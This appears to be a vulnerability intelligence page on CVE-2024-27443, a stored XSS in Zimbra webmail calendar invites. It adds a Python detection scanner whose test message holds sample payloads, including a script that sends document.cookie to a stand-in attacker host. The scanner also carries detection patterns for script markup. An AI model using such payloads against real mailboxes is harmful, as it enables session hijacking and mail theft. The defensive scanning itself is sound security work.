🟢 CVE-2024-27443

This is a Cross-Site Scripting (XSS) vulnerability in the Zimbra webmail classic interface. The attacker sends the victim an email whose crafted calendar header carries the payload, which runs when the message is viewed. Zimbra is internet-facing, but the script executes in the victim's browser session rather than on the server, so this is a phishing-style client attack rather than direct server exploitation. The compromised session is a mailbox session, so mail contents and any action the user can take in webmail are within the attacker's reach.

Risk Level: LOW_RISK
CVSS Score: 6.1
Attack Vector: NETWORK
ATT&CK Tactic: Execution
ATT&CK Technique: T1203 — Exploitation for Client Execution
Deployment Risk: HIGH
Ransomware: No

📋 Vulnerability Details

Data Source: CIRCL

Confidence: HIGH

Exploitation Method: PHISHING

CVE Published: 2024-08-12

Added to CISA KEV: 2025-05-19 (280 days between CVE publication and KEV listing)

🎯 Recommendations:

🔍 Web Intelligence (Kagi · 2026-06-04)

CVE-2024-27443 is a Cross-Site Scripting (XSS) vulnerability affecting the CalendarInvite feature of the Zimbra Collaboration Suite (ZCS) classic webmail user interface [1] [5].

Exploitation and Threat Actor Activity
  • Active Exploitation: The vulnerability is confirmed to be exploited in the wild [2] [5].
  • Targeting: It has been observed targeting government entities and defense companies [4].
  • CISA KEV: Due to confirmed active exploitation, it was added to the CISA Known Exploited Vulnerabilities (KEV) catalog on May 19, 2025 [2] [5].
Attack Method and Requirements
  • Attack Vector: Remote. An attacker exploits this by sending an email message containing a specially crafted calendar header that embeds an XSS payload [1].
  • User Interaction: Required. The payload executes when a victim views the malicious email in the Zimbra webmail classic interface.
Impact
  • Access/Impact: Successful exploitation allows the execution of arbitrary JavaScript within the context of the victim's webmail session [3]. This can lead to session hijacking, unauthorized actions on behalf of the user, or data theft.
Affected Versions and Mitigation
  • Affected Versions: Zimbra Collaboration (ZCS) versions 9.0 and 10.0 are affected [1] [5].
  • Mitigation: Organizations are advised to update to the latest available patch provided by the vendor [2]. Because exploitation was confirmed before the KEV listing, patching should be paired with a review of stored mail for messages carrying markup in calendar headers and with invalidation of active webmail sessions, since a hijacked session survives the patch.
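As an added detection example (not code from Zimbra, ESET, CISA, or any source cited above), the Python below scans a raw RFC 822 message for script-like markup in its headers and in any text/calendar part. The page identifies the vector only as a crafted calendar header, so the scanner checks every header after RFC 2047 decoding rather than one named field; the X-Calendar-Note header and both sample messages are constructed for illustration and do not describe the real exploit.

```python
"""Scan a raw message for HTML/script content in headers and iCalendar parts.

Added example, not Zimbra's code and not from the advisory sources above.
The advisory says only "crafted calendar header", so every header and every
text/calendar MIME part is inspected rather than one specific field.
"""
import re
from email import policy
from email.parser import BytesParser
from typing import Optional

# Markup that has no business in a raw header value or an iCalendar line.
XSS_PATTERNS = [
    ("script-tag", re.compile(r"<\s*script\b", re.I)),
    ("event-handler", re.compile(
        r"\bon(error|load|click|mouseover|focus|toggle|animationstart)\s*=", re.I)),
    ("javascript-url", re.compile(r"javascript\s*:", re.I)),
    ("active-element", re.compile(r"<\s*(img|svg|iframe|object|embed)\b", re.I)),
]


def _first_match(text: str) -> Optional[str]:
    for label, rx in XSS_PATTERNS:
        if rx.search(text):
            return label
    return None


def _unfold_ical(body: str) -> str:
    # RFC 5545 folds long lines as CRLF + one space/tab; a payload split across
    # a fold would otherwise evade a line-by-line regex.
    return re.sub(r"\r?\n[ \t]", "", body)


def scan_message(raw: bytes) -> list:
    """Return one finding per header or iCalendar line carrying XSS-like markup."""
    # policy.default unfolds headers and decodes RFC 2047 encoded words, so a
    # payload hidden behind =?utf-8?b?...?= is inspected in decoded form.
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = []
    for name, value in msg.items():
        label = _first_match(str(value))
        if label:
            findings.append({"where": f"header:{name}", "indicator": label,
                             "sample": str(value)[:80]})
    for part in msg.walk():
        if part.get_content_type() == "text/calendar":
            for line in _unfold_ical(part.get_content()).splitlines():
                label = _first_match(line)
                if label:
                    findings.append({"where": "text/calendar", "indicator": label,
                                     "sample": line[:80]})
    return findings


# Constructed sample: X-Calendar-Note is a hypothetical header name (not a
# real Zimbra field); the DESCRIPTION payload is folded across two lines.
MALICIOUS_EML = (
    b"From: attacker@example.net\r\n"
    b"To: victim@example.org\r\n"
    b"Subject: Meeting\r\n"
    b"X-Calendar-Note: <img src=x onerror=alert(document.cookie)>\r\n"
    b"Content-Type: text/calendar; method=REQUEST; charset=utf-8\r\n"
    b"\r\n"
    b"BEGIN:VCALENDAR\r\n"
    b"BEGIN:VEVENT\r\n"
    b"SUMMARY:Quarterly review\r\n"
    b"DESCRIPTION:<scr\r\n"
    b" ipt>fetch('//attacker.example/?c='+document.cookie)</script>\r\n"
    b"END:VEVENT\r\n"
    b"END:VCALENDAR\r\n"
)

# Constructed benign invite for comparison.
BENIGN_EML = (
    b"From: colleague@example.org\r\n"
    b"To: victim@example.org\r\n"
    b"Subject: Meeting\r\n"
    b"Content-Type: text/calendar; method=REQUEST; charset=utf-8\r\n"
    b"\r\n"
    b"BEGIN:VCALENDAR\r\n"
    b"BEGIN:VEVENT\r\n"
    b"SUMMARY:Quarterly review\r\n"
    b"DESCRIPTION:Agenda: patch status for the 9.0 and 10.0 hosts\r\n"
    b"END:VEVENT\r\n"
    b"END:VCALENDAR\r\n"
)


if __name__ == "__main__":
    for f in scan_message(MALICIOUS_EML):
        print(f"{f['where']:<24} {f['indicator']:<15} {f['sample']}")
    print("benign findings:", scan_message(BENIGN_EML))
```

Run it over .eml files pulled from the mail store or at a gateway. Expect some noise from the active-element pattern: Outlook-generated invites carry an X-ALT-DESC property with an HTML body, so tune that pattern or whitelist that property before treating hits as incidents, while script tags, event handlers and javascript: URLs in a header value are worth an alert on their own.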

Sources

  1. CVE-2024-27443 Detail - NVD

    A Cross-Site Scripting (XSS) vulnerability exists in the CalendarInvite feature of the Zimbra webmail classic user interface, because of improper input ... CVE-2024-27443 Detail Description An issue was discovered in Zimbra Collaboration (ZCS) 9.0 and 10.0. A Cross-Site Scripting (XSS) vulnerability…

  2. Synacor Zimbra Collaboration Suite XSS Vulnerability (CVE-2024 ...

    As described in a blog post by ESET Research, this vulnerability is currently being exploited in the wild and is found to be targeting government entities and ... CVE-2024-27443 is a vulnerability affecting Zimbra Collaboration. As described in a blog post by ESET Research, this vulnerability is cur…

  3. Known Exploited Vulnerabilities Catalog | CISA

    CVE-2024-27443. Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability: Zimbra Collaboration contains a cross…

  4. SecurityScorecard Advisory: Synacor Zimbra Collaboration Suite XSS...

    CVE-2024-27443 is a vulnerability affecting Zimbra Collaboration. As described in a blog post by ESET Research, this vulnerability is currently being exploited in the wild and is found to be targeting government entities and defense companies. On May 19, 2025, this vulnerability was added to CISA’s…

  5. CISA Adds Zimbra Collaboration Vulnerability (CVE-2024-27443) to...

    CVE-2024-27443 is an actively exploited XSS vulnerability in the Zimbra Collaboration Suite (ZCS), affecting versions 9.0 and 10.0. The flaw resides in the CalendarInvite feature of the Zimbra webmail classic UI.Date Added to CISA KEV: May 19, 2025 Exploitation Status: Confirmed in the wild Severity…